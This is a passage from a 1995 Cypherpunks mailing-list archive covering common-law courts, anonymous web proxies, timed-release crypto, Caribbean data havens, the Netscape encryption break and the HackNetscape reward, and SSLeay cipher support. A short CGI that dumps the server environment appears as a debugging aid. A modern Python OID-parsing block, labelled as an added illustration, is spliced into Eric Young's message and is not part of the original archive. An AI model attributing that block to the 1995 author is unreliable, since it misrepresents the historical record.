> | >University of Oregon history professor Richard Brown, "is
> | >'popular sovereignty,' that people are above the law.
> | >These people are alienated from the legal system. To some
> | >extent it sounds like they're also trying to settle
> | >personal scores."
> 
> I suddenly got very cold.
> 
> I think the world has seen enough of 'revolutionary justice',
> both in the Soviet Union; there are some fascinating passages
> of Lenin about avoiding the bourgeois invented 'justice' concept, 
> and that the revolution was well 'above' that whole thing,
> 
> and in Germany.
> 
> And I guess in current China.
> 
> When the people and the governing establishment has lost contact
> this much, you're in for trouble.
> 
> (Ok, remember I'm a dumb Swede, that still happens to believe that
> State and People doesn't have to be enemies. And I do believe in a
> sensible dialog between different interest groups etc etc. Flame
> away, I'm just dumb anyway. ;-))
> 
> /Christian
> 


There has been much handwringing today over some poor guys out west
who have been  holding their own "common law courts,"  along with 
wonderment that they lack faith in the American justice system.

In the last year we've seen in the national news:

* FBI and BATF murdering, lying, & tampering with evidence. (Waco/ Ruby 
  Ridge hearings / WTC bombing trial /etc.)

* Cops confiscating cash from citizens in Atlanta, and pocketing it.

* Cops fabricating evidence wholesale in Philadelphia.

* Cops admitting to beating people in LA.

* Cops from NYC having drunken riots in D.C.

* Cops from around D.C. beating a suspect - later found to be 
  innocent - until he was comatose.

* Cops having a shootout - among themselves - in AZ.

* Cops raping and murdering in New Orleans.

In several of these cases, little or no punishment resulted.


A couple of local incidents, in Knoxville, TN:

* Several months ago, the local paper (Knoxville News-Sentinel) revealed 
that jailers at the city/county jail are in the habit of  hanging 
prisoners by their wrists until their hands turn black.  Those that are 
really disfavored are also forced to wear a vomit-filled hood.  To my 
knowledge, no one has yet been taken to task for this.

* Knox medical examiner Randall Pedigo was found to be drugging and
raping young boys.  He pulled a gun on the cops and was shot.  After 
recovering, he was allowed to plead guilty in return for a 1-year sentence
at the penal farm.


The mayor of Knoxville, Victor Ashe, is active in the U.S. Conference 
of Mayors and has served as a spokesman for the organization.  Presumably,
he and they are untroubled by events like the above.  I can't recall him -
or them - so much as expressing concern.



The "angry white men" have just figured out what the angry black men 
have known for a long time:  that the "justice system" in the US is a tool
used by some to impose their will on others.  It has little if 
anything to do with justice.

Is this radical right-wing rhetoric or is it Marxist?  Or is it just a 
statement of fact?

What percentage of the population can think this way without the jury 
system failing?  What percentage does think this way?  Is that why we're 
hearing calls for the abolition of the jury system?


Tenuous crypto tie:  

Why would anyone trust these guys to hold our escrowed keys?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Mon, 18 Sep 95 08:15:16 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Anonymous WWW proxy Alpha release available
In-Reply-To: <199509181421.KAA01875@panix.com>
Message-ID: <9509181514.AA16343@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell writes:
 > Thanks.  What we now need is a proxy located in the US with good connections
 > for performance.
yes ! yes ! anyone with tcl-dp and tclX installed to run one ?
we need to have a 'network' of proxies !
[maybe I shall 'translate' the prototype in perl or C... but I'm much
more used to Tcl than Perl, and Tcl writing is infinitely faster than C
for web tasks]

 > Does anyone know a good test page that reads back the info
 > your browser is putting out so you can test proxies?

http://hplyot.obspm.fr:8001/
shows what has been sent to it by the browser (between other www
goodies) [You can put the following 
---8<---
#! /bin/sh
echo "Content-type: text/plain"
echo ""
/bin/env
---8<---
as a minimal debugging cgi too, on any httpd, if you want]

regards
dl

-- 
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 18 Sep 95 17:27:49 PDT
To: cypherpunks@toad.com
Subject: Re: Time release crypto
Message-ID: <ac835abf07021004c9ff@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:16 PM 9/18/95, Stephen D. Williams wrote:
>What minimal requirements would be needed to support encrypted packets/files
>that a holder could only decrypt after a certain date/time?
>(Time Escrow?)


An interesting topic, of which there have been several discussions in
the past few years. A check of the archives will reveal dozens of articles.
(My own archives contain more than 30 articles on this topic.)

I'm not trying to squelch any debate. I would ordinarily respond to this
thread, and write an article, but with all the archived articles, why
bother?

This last came up in a major way in June of 1994, with several articles
posted by me, Eric Hughes, Eli Brandt, Peter Wayner, Russ Busdiecker, Karl
Barrus, Blanc Weber, and all the Usual Suspects (but not Kiser Sose).


I'll forward an article (below) I did in 1993 on timed-release crypto.

--Tim May


Date: Wed, 10 Feb 93 11:55:45 -0800
To: cypherpunks@toad.com
From: tcmay@netcom.com (Timothy C. May)
Subject: Timed-Release Crypto


Cypherpunks,

I want to share with you folks some preliminary ideas on "timed-release
cryptographic protocols," that is, methods for sending encrypted messages
into the future.

These ideas need more work, but since I have recently mentioned them to Hal
Finney, Max More, Mark Miller, and perhaps others, I guess it's time to say
something here.

Why would anyone want to send encrypted (sealed) messages into the future?

1. Foremost, to send money into the future, while protecting it in the
meantime from seizure, taxation, etc. This might be of interest to cryonics
folks who want to arrange for their own revival/reanimation at some time in
the future. (Existing systems have relied on creating endowments, insurance
contracts, trust funds, and the like. The trust of the agent is the means
for sending funds into the future--clearly this agent could be compromised,
raided, taxed, put out of business, etc. Though I am personally not a
cryonics client, I began thinking about this problem in 1989 and talked it
over with Phil Salin, who, ironically, is now himself in cryonic
suspension.)

2. To fulfill contracts with long payoff dates. One might wish to deliver
money at some future date, or to supply information at some future date.

3. "In the event of my death"-type messages, with guaranteed delivery of
some message or text in the event that something happens (or, of course,
that the message is not "countermanded" by the sender).

4. A software publisher might place source code in a timed-release escrow,
agreeing to release the code in 10 years, for whatever reason. (Of course,
he may lie, but that's another issue. Possibly the digital time-stamping
work of Haber and Stornetta can be used.)

I'm sure you can think of other uses. I argue that this timed-release
message is a kind of cryptographic primitive...though it may be argued that
it's just a variant of an ordinary message transmission, albeit one through
time instead of through space.

Diving right in, some approaches:

A message is encrypted (standard public key means, though private key
methods work the same way) and "sent out." Perhaps into a network of
remailers or a Cuperman-style "pool" (BTW, my compliments to Miron C. for
deploying such a thing..the first of many, I suspect). The encrypted
message is just a "passive" item in this scheme...it stays encrypted, is
available to all, etc. (in other words, the security of the message being
time-released does not in any way depend on hiding the existence or
location of the encrypted message, though of course it is important that
the encrypted message be widely distributed and not explicitly advertised
or tagged as being a timed-release message.)

(Detail note: Why not? Because some governments may see timed-release
messages as automatically being tax-avoiding, cryonics-supporting,
seditious, etc., messages and may attempt to hunt down and erase any such
messages...perhaps via "hunter-killer crypto viruses" or somesuch.)

Let us suppose the encrypted message is to be unlocked in 30 years. (It
could also be when some recognized event occurs, such as a Mars landing or
the death of the sender, or whatever...you'll see how this works). How can
the decryption key be prevented from being used in the meantime?

(To make this clear: both the encrypted message _and_ the decryption key are
"in circulation" during all of those 30 years. Any scheme that relies on
the sender himself keeping the decryption key "secret" for those 30 years
is of course no fun at all...it's just what we have today and involves no
new cryptographic primitives, just ordinary human-mediated secrecy.)

But if the encrypted message and the decryption key are both in circulation
for all of those 30 years, what's to keep someone from decrypting the
message in _one_ year, for example?

The answer: independent escrow agents who handle large volumes of messages
and agree to hold them for various amounts of time. Because they have no
idea of what's inside the encrypted messages they hold--and some may be
"test" messages deposited deliberately by reputation-rating or
credentialling agencies, such as "Consumers Crypto Guide"--and because
their business is holding things in escrow, they will not generally open
messages before the time specified.

"Aha!," I hear you exclaim, "Tim's scheme depends solely on the trust of
these escrow agents, and that's no different from depositing a sealed
envelope with your friendly lawyer and asking him to promise not to peek."

Here's how crypto and reputation-based systems make my scenario different
(and stronger, I am arguing):

- an ecology of many escrow services, many pools, many encrypted-message
senders makes for a more robust system against subversion of any single
agent.

- no escrow agent knows what is contained in a sealed message, hence the
temptation to peek is reduced. (A wrinkle: escrow agents, like remailers,
will probably go to automatic hardware that is tamper-resistant (cf.
discussion of tamper-resistant or tamper-responding, modules in the Crypto
Glossary distributed at the first physical Cypherpunks meeting and
available in the archives). Thus, the hardware will automatically execute
certain protocols and make peeking a pain.)

- the best escrow agents (someday) may in turn increase security and their
own reputations by in turn using secondary contracts, i.e., by contracting
with _other_ escrow agents to seal parts or all of their messages.

- what results is that the original message is scattered around in various
publicly available locations (perhaps paid-for by dribbles of crypto-money
from crypto escrow agents, but this is a detail easily worked out in
various ways). The decryption key to the original message is itself broken
up into several or many pieces and scattered to a network of
"remailer"-like agents (they are essentially "remailers into the future,"
by agreeing as part of their protocol to hold messages for some amount of
time). As time passes, these various messages (pieces, remember) are
retrieved, forwarded, and generally bounced around the network.

- some escrow agents may be just "fixed delay" nodes. For example, "Alice's
Rest Stop" remailer node widely advertises that it will take in messages
and simply delay them for some fixed time, e.g., for a year. For some fee
based on message size. (Clearly the fixed time delay is a crufty approach,
much less flexible than variable delays negotiated by the messages
themselves, but it makes the idea clearer in some ways: a network of many
such one-year delays could thus "send" a message into the future in
one-year jumps.)

(It is important to remember that these messages are "first-class objects,"
to borrow a phrase, and that all messages essentially look the same and
have the same "rights" (Dean Tribble is probably barfing at my
appropriation of object-oriented lingo, but it seems appropriate). That is,
inspection of the bytes will not reveal to someone whether the message is a
$2 message, a simple love letter, a business contract, a remailed item, a
$100K cryonics payment, etc. Thus, the "authorities" cannot simply target
some class of messages and ban them or launch "hunter-killer crypto
viruses" against them, at least not without shutting down the whole
system!)

- the individual pieces may have instructions attached, such as "You will
be paid 10 crypto credits if you hold me for one year and then decrypt me."
(Not to belabor the point, but the means by which this "contract" can be
enforced are that the escrow agents never know when they're being tested,
when they're being monitored by rating services. This kind of "trust" is
what allows ordinary deposit banks to work...their business is taking
deposits and lending money, not repudiating the honest claims of
customers.)

- thus, I envision a swarm of messages being stored-and-forwarded in space
and time, with an observer seeing only bits flowing around. Nobody except
the original "launcher" (who needs to be fairly careful about the path he
selects, about robustness against some fraction of the escrow/remailer
agents going out of business, etc.) knows what's going on.

- and as the end of the 30-year period approaches, to continue with the
example I started with, the decryption key gets "reconstituted" in various
ways (depends on what is desired, and how protocols evolve...I don't claim
to have the details already worked out). For example, after 30 years the
various messages stored in escrow accounts are forwarded separately to "The
Immortalist Foundation," which may in fact be a digital pseudonym (as we
have discussed so many times here). This entity puts the pieces together,
sort of like combining the missing pieces of a text and reconstituting a
genie or demon, and finds it can now unlock the original encrypted message.
It finds, say, a million crypto credits, or the location of some physical
treasure, or whatever.

(Needless to say, there are some obvious questions about what long-term
money will be stable, what banks will still exist after 30 years, and so
on. I expect new forms of time deposits to evolve. Can the original sender
be expected to know what will evolve before he seals his original message?
Some obvious issues to work on--I never claimed it would be trivial, or
static. One approach is to allow some human intervention, where an
"investment agent" opens a digital money message, redeems it, and reinvests
it in some new instrument. As usual, he would not know who the original
investor was and would be "tested" by reputation-rating agencies. It _does_
get complicated, I know.)

The Key Point: Messages sent into this network of remailers, escrow
accounts, pools, and investment agents are untraceable to the sender and
are generally unidentifiable. To break a single message involves breaking
the entire system (or colluding with enough remailer nodes, as in any
DC-Net sort of system). As with remailer networks, the expectation is that
they will become sufficiently pervasive and trans-nationalized that
breaking the entire system is just too painful and difficult (much the way
the Net is already too pervasive to easily shut down, even if some uses of
it are undesirable to various national authorities).

Timed-release messages are objects that can be transmitted, encrypted, and
can carry further instructions on where to mail them next, on how much
digital money to pay to this next link, and various other instructions or
protocols.

(In other words, they are "agents" that can negotiate various contracts,
for remailing, for storage, etc. Since they are "powerless" in a human
sense, their security is provided by double-checks--perhaps by other agents
who are watching and waiting--and by the general "shell-game" system of
reputations, credentialling, and so on.)

To make this scheme clearer in a simple way, I could publicly post an
encrypted message to this list, or in one of the "pools," and then scatter
the decryption key in several pieces with several members of this list,
paying them $1 each to "hold" their piece for, say, a month. At the end of
the month, they would fulfill their end of the bargain by forwarding the
piece they hold to some public place or pool and the decryption key would
be reconstituted (don't press me for exact details....PGP doesn't support
this directly, but could). For robustness against loss of some of the
messages, an n-out-of-m voting scheme could be used (e.g., any 5 of 8
pieces are sufficient to reconstruct the decryption key).

The result is a message from the past, a timed-release message.

I'm anxious to hear your comments. I think such a cryptographic primitive
could be useful for a lot of purposes.

-Tim May

--

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 18 Sep 95 17:40:19 PDT
To: cypherpunks@toad.com
Subject: Caribbean Internet Services?
Message-ID: <ac835f9008021004ec69@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



A brief note, though the hardship to the Caribbean islands will not be brief.

St. Thomas, St. Croix, and other islands were hit extremely hard by
hurricane Marilyn. Previous hurricanes, including Luis, also hit some of
the islands.

Power in St. Thomas may not be back for a year in some parts. The roads,
sewers, power lines, phone system, etc. will likely have to be completely
rebuilt.

(Yes, there have been more hurricanes this year than in most years...not
clear if it's just a Poisson fluctuation, or symptomatic of deeper weather
pattern changes.)

ObCypherpunks Relevance: A couple of past or current list members have
nascent Internet plans in some of these islands. (I think one of them is
way south, just off Venezuela.)

I suspect "Caribbean Data Havens" and "Internet Sites" are further off than
they were a few months ago.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Mon, 18 Sep 95 17:59:21 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Caribbean Internet Services?
Message-ID: <v02120d0cac83d29f4af9@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Actually, it just highlights the need to make sure one is relying
on buried/underwater cables, as well as the importance of hurricane
resistant architecture.

Virtually all of the buildings destroyed would have been obviously
unsuitable for locating important servers even before this recent
reminder.

Note that this is not an endorsement or a condemnation of "Libertaria
in Cyberspace" or in any particular physical location.

>I suspect "Caribbean Data Havens" and "Internet Sites" are further off than
>they were a few months ago.
>
>--Tim May
>
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
>Corralitos, CA              | knowledge, reputations, information markets,
>Higher Power: 2^756839      | black markets, collapse of governments.
>"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 18 Sep 95 18:11:50 PDT
To: cypherpunks@toad.com
Subject: Hack Netscape!
Message-ID: <199509190106.SAA02447@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	The T-shirt isn't designed yet but I think the web page can
take public consumption now. Check out http://www.c2.org/hacknetscape

-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Mon, 18 Sep 95 14:46:49 PDT
To: cypherpunks@toad.com
Subject: Time release crypto
Message-ID: <m0suoUI-0009yvC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


What minimal requirements would be needed to support encrypted packets/files
that a holder could only decrypt after a certain date/time?
(Time Escrow?)

Or a server that releases keys if a 'heartbeat' isn't or a trigger is received?
(Escrow in the banking/legal sense.)
(Video/sound recordings for security, opened at court's request, Ecash
Escrow, missing persons)

The obvious is a server that releases keys periodically (and serves old keys
at will).

Is there any way to make this trustable?

Multiple servers with shared (xor split, etc.) keys of some kind?


Design ideas?


Applications: 

Gov. docs with expiration dates for privacy/secrecy.

Source code for projects (if a company folds, copyright expires, etc.).

Contract release to companies, public, etc.
(15 minute stock data, agreements for commercial use initially,
 public/fair use later)

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Mon, 18 Sep 95 09:58:44 PDT
To: cypherpunks@toad.com
Subject: Re: Explaining Zero Knowledge to your children
Message-ID: <9509181655.AA06115@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> Clever, but I think it's missing an important element of zero knowledge
> interactive proof systems. For example, why not simply open _both_ hands?

That's the same problem as with the cave: Why not just go into the left
passage and come out of the right passage.


Both are absolute proofs. If you have two identical bills you must be able
to copy them.

In a cryptographical proof there is always the chance to guess. The chance
is sometimes 50%, sometimes very small.


What about this idea:

Alice is caught in a dark room somewhere in the world. She doesn't know
where she is, but there is a telephone in the room and she calls Bob to
ask him where she is. Bob claims to know it but doesn't want to reveal. 
He calls her back. When the phone is ringing, he has proven the knowledge
of her phone number, but she still doesn't know where she is or how he
could know. And there is still the chance that Bob has guessed the number.



Mmmh,

Hadmut







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 18 Sep 95 16:06:45 PDT
To: perry@piermont.com
Subject: Re: Netscape's random numbers
Message-ID: <9509182305.AA15954@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>It would be remarkably stupid for them to try to enforce the
>provision.

Perhaps, but it that's secondary to the bad spin the media could
end up having on it.  Preventing that problem was a major point of
my article, which discussed the media and netscape not at all.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 18 Sep 95 19:16:06 PDT
To: cypherpunks@toad.com
Subject: COMMUNITY CONNEXION OFFERS REWARD FOR EXPOSING ENCRYPTION FLAWS
Message-ID: <199509190211.TAA07099@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


For Immediate Release
Contact: sameer@c2.org 510-601-9777

COMMUNITY CONNEXION OFFERS REWARD FOR EXPOSING ENCRYPTION FLAWS

Sept 19 1995 - Community ConneXion, a privacy server and ISP in
Berkeley, California, today announced that it will be offering an
incentive to the net to expose security flaws in some software that is
advertised on the net as secure.

This weekend a member of the cypherpunks community, Ian Goldberg, and
his officemate, David Wagner, revealed a method which would allow
someone to break the encryption used by Netscape Navigator in 25
seconds. Netscape Communications Corporation has been advertising
their products as a "secure" way of communicating sensitive
information over the net. People have been using this Netscape
software to send their credit card numbers over the net, communicate
with their brokers, and other tasks requiring security.

"Netscape was apparently relying on security by obscurity in this
case," said Community ConneXion's founder, Sameer Parekh.

In light of this recent break and the earlier two brute force attacks
on the encryption used in the international version of Netscape
Navigator (crippled because of restrictions on the export of
cryptography from the United States) Community ConneXion has offered a
challenge to the net community to find more holes. Ian, David, and the
people responsible for the brute-force attacks will be receiving free
limited-edition T-shirts for their work.

"The more holes people find, the more holes will get fixed. Netscape
makes the most widely used commercial WWW software out there, so it is
in the net's best interest for netscape to have good security. By
exposing the holes in netscape, we will hopefully get them fixed,"
said Sameer.

Details about the HackNetscape promotion are available from
http://www.c2.org/hacknetscape, or by sending mail to
hacknetscape@c2.org.

Community ConneXion is the premier internet privacy ISP. They offer
anonymous accounts, remailers, and pseudonym servers, in addition to
the standard ISP fare of webspace and dialup IP access. Information is
available from http://www.c2.org or mailing info@c2.org.

Netscape and Netscape Navigator are trademarks of Netscape
Communications Corporation. This promotion is not affiliated with NCC.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Mon, 18 Sep 95 02:11:20 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape Navigator 2.0 will implement secure e-mail
In-Reply-To: <43jau5$qbj@tera.mcom.com>
Message-ID: <Pine.SOL.3.91.950918185301.29263B-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On 18 Sep 1995, Jeff Weinstein wrote:
> The implementation guide recommends using rc2-cbc 40-bit for content
> encryption when there is no way to determine the capabilities of the
> recipient.  When you do know what the recipient can do, it recommends
> using RC2-CBC with a longer key or DES-CBC.

Hmm....  notice the use of a non public cipher as the base cipher.... 
what a shame.... 

A note for non-USA people, the next version of SSLeay will include the 
full functionality of RSAref/RSAeuro and I should soon have the PKCS-7 
stuff finished in the next release after that.  I've almost finished the 
documentation of the encryption/RSA type routines. The encryption/open/seal 
routines supporting any cipher that conforms with a specified Cipher API.

It will be shipping with examples of des-ecb, des-cfb, des-cbc, des-ede2, 
des-ede3, idea-ecb, idea-cfb, idea-cbc and rc4-128.  If people could send 
me the official Object identifiers for these ciphers, I'll be able to 
support them in PKCS-7, otherwise they will only be supported in PEM mode.
eg,
rc4 is '1 2 840 113549 3 4'
but I don't even know what des in cbc mode is.  I lack documentation.
If anyone can email SMIME/PKCS-7 stuff that is encrypted/sealed, I'll be 
able to extract the object identifiers.


> For key encryption support for RSA with key sizes of 512 to 1024 is
> required, and support for 2048 bit keys is recommended.  A minimum
> key size of 768 bits is recommended for US users.

Again, SSLeay has no restrictions, 4096 bits anyone :-)

eric (who is just lacking documentation :-(
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)
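
Added illustration, not Eric Young's or SSLeay's code: how the rc4 identifier quoted above, '1 2 840 113549 3 4', is carried in DER, and how object identifiers can be pulled out of an encoded structure by walking its TLVs. The sample structure is constructed for this example, all function names are assumptions, and only definite-length encodings with single-byte tags are handled.

```python
def encode_oid(text: str) -> bytes:
    """DER-encode an OID written as '1 2 840 ...' or '1.2.840...'."""
    arcs = [int(a) for a in text.replace(".", " ").split()]
    if (len(arcs) < 2 or any(a < 0 for a in arcs) or arcs[0] > 2
            or (arcs[0] < 2 and arcs[1] > 39)):
        raise ValueError("invalid arcs")
    body = bytearray()
    # The first two arcs share one subidentifier: 40 * first + second.
    for value in [40 * arcs[0] + arcs[1]] + arcs[2:]:
        group = [value & 0x7F]
        value >>= 7
        while value:                      # base-128, high bit set on all but the last
            group.append(0x80 | (value & 0x7F))
            value >>= 7
        body.extend(reversed(group))
    if len(body) > 127:
        raise ValueError("OID body too long for short-form length")
    return bytes([0x06, len(body)]) + bytes(body)


def decode_oid_body(body: bytes) -> str:
    """Decode the content bytes of an OID back to the space-separated form."""
    if not body or body[-1] & 0x80:
        raise ValueError("empty or truncated OID")
    values, current = [], 0
    for byte in body:
        current = (current << 7) | (byte & 0x7F)
        if not byte & 0x80:
            values.append(current)
            current = 0
    first = min(values[0] // 40, 2)
    arcs = [first, values[0] - 40 * first] + values[1:]
    return " ".join(str(a) for a in arcs)


def read_tlv(data: bytes, pos: int, limit: int):
    """Return (tag, value_start, value_end) for the TLV at `pos`."""
    if pos + 2 > limit:
        raise ValueError("truncated header")
    tag, length = data[pos], data[pos + 1]
    if tag & 0x1F == 0x1F:
        raise ValueError("multi-byte tags not handled")
    pos += 2
    if length & 0x80:
        n = length & 0x7F
        if n == 0 or n > 4 or pos + n > limit:
            raise ValueError("indefinite (BER) or unsupported length")
        length = int.from_bytes(data[pos:pos + n], "big")
        pos += n
    if pos + length > limit:
        raise ValueError("value runs past its container")
    return tag, pos, pos + length


def extract_oids(data: bytes, pos: int = 0, limit=None):
    """Walk the structure and collect every OID, descending into constructed types."""
    limit = len(data) if limit is None else limit
    found = []
    while pos < limit:
        tag, start, stop = read_tlv(data, pos, limit)
        if tag == 0x06:
            found.append(decode_oid_body(data[start:stop]))
        elif tag & 0x20:                  # constructed (SEQUENCE, SET, [n] EXPLICIT)
            found.extend(extract_oids(data, start, stop))
        pos = stop                        # primitive values are skipped, not scanned
    return found


def tlv(tag: int, body: bytes) -> bytes:
    """Helper for building the constructed sample (short-form length only)."""
    if len(body) > 127:
        raise ValueError("sample helper only builds short TLVs")
    return bytes([tag, len(body)]) + body


def demo():
    rc4 = encode_oid("1 2 840 113549 3 4")
    algorithm = tlv(0x30, rc4 + tlv(0x05, b""))          # SEQUENCE { OID, NULL }
    # Constructed payload whose bytes happen to look like an OID header (06 01 2a).
    payload = tlv(0x04, b"\x06\x01\x2aconstructed")
    return extract_oids(tlv(0x30, algorithm + payload))


if __name__ == "__main__":
    print(encode_oid("1 2 840 113549 3 4").hex(), demo())
```

Walking the structure rather than searching for 0x06 bytes matters here: the sample's OCTET STRING contains bytes that a naive scan would report as a second identifier.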





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 18 Sep 95 16:15:29 PDT
To: cypherpunks@toad.com
Subject: Your name in print
Message-ID: <9509182315.AA16020@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>From owner-www-security@ns2.rutgers.edu Mon Sep 18 17:36:41 1995
Received: from ns2.rutgers.edu (ns2.rutgers.edu [128.6.21.2]) by postman.osf.org (8.6.9/8.6.x) with ESMTP
	id RAA13528; Mon, 18 Sep 1995 17:36:34 -0400
Received: (from daemon@localhost) by ns2.rutgers.edu (8.6.12+bestmx+oldruq+newsunq/8.6.12) id MAA00546 for www-security-outgoing; Mon, 18 Sep 1995 12:35:37 -0400
Received: from whiz.mfi.com (whiz.mfi.com [198.71.19.34]) by ns2.rutgers.edu (8.6.12+bestmx+oldruq+newsunq/8.6.12) with SMTP id MAA00534 for <www-security@ns2.rutgers.edu>; Mon, 18 Sep 1995 12:35:18 -0400
Received: from ccmail2.mfi.com by whiz.mfi.com (AIX 3.2/UCB 5.64/4.03)
          id AA31083; Mon, 18 Sep 1995 09:26:41 -0700
Received: from ccMail by ccmail2.mfi.com
	id AA811441583 Mon, 18 Sep 95 09:26:23 PST
Date: Mon, 18 Sep 95 09:26:23 PST
>From: "Prince, Cheryl" <cprince@mfi.com>
Encoding: 663 Text
Message-Id: <9508188114.AA811441583@ccmail2.mfi.com>
To: www-security@ns2.rutgers.edu
Subject: security article
Sender: owner-www-security@ns2.rutgers.edu
Precedence: bulk
Errors-To: owner-www-security@ns2.rutgers.edu
Status: RO



I am an editor at a business technology publication and am currently 
researching a piece on network security at financial institutions as well as 
the feasibility of secure Internet transactions and banking on the world wide 
web. 

I will be interviewing individuals who can speak to these issues and can talk 
about whether the banking industry can in fact move much of its activity on 
line without risking the loss of billions of dollars to online theft and other 
related damage.  

If you are familiar with this subject matter and/or have any experience in the 
financial industry, please email me at: cprince@mfi.com

Thanks,

CJ Prince





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 18 Sep 95 19:23:37 PDT
To: tedwards@Glue.umd.edu (Thomas Grant Edwards)
Subject: Re: Hack Netscape!
In-Reply-To: <Pine.SUN.3.91.950918220842.9126A-100000@volt.isr.umd.edu>
Message-ID: <199509190217.TAA07775@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Community ConneXion doesn't have the budget to give a free
T-shirt to everyone who helped. ;-)

	You can buy one of the general release t-shirts we'll be
making though. 

> 
> On Mon, 18 Sep 1995, sameer wrote:
> 
> > 	The T-shirt isn't designed yet but I think the web page can
> > take public consumption now. Check out http://www.c2.org/hacknetscape
> 
> Heh, what about a shirt for the people who worked through keyspace for 
> the second crack? ;)
> 
> -Thomas
> 


-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 18 Sep 95 19:22:18 PDT
To: cypherpunks@toad.com
Subject: Re: Caribbean Internet Services? (fwd)
Message-ID: <ac83779c0e02100492d6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:00 AM 9/19/95, Jim Choate wrote:

>> ObCypherpunks Relevance: A couple of past or current list members have
>> nascent Internet plans in some of these islands. (I think one of them is
>> way south, just off Venezuela.)
>>
>> I suspect "Caribbean Data Havens" and "Internet Sites" are further off than
>> they were a few months ago.
>>
>
>Satellite dishes and a steady supply of gasoline via a couple of tankers
>would make such an operation completely portable. A more ideal solution
>would be to moor a ship in international waters (wasn't some group wanting
>to do this for 'humanitarian' reasons or somesuch?).

Sure, there are possible fixes to the various problems. I'm not saying the
Caribbean will shut down, only that this will likely increase operating
costs, in at least some of the areas, and will frighten off some investors.
Human nature.

The model need not be physical sites in these locales, of course. But even
maintaining a business office in some of these locales will be a hassle.

(This is where I expect the usual folks will jump in and shout "On the
contrary!" Note however, how few of them actually live in St. Barts, or
Anguilla, or Curacao, or the Bahamas.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yih-Chun Hu <yihchun@u.washington.edu>
Date: Mon, 18 Sep 95 19:45:22 PDT
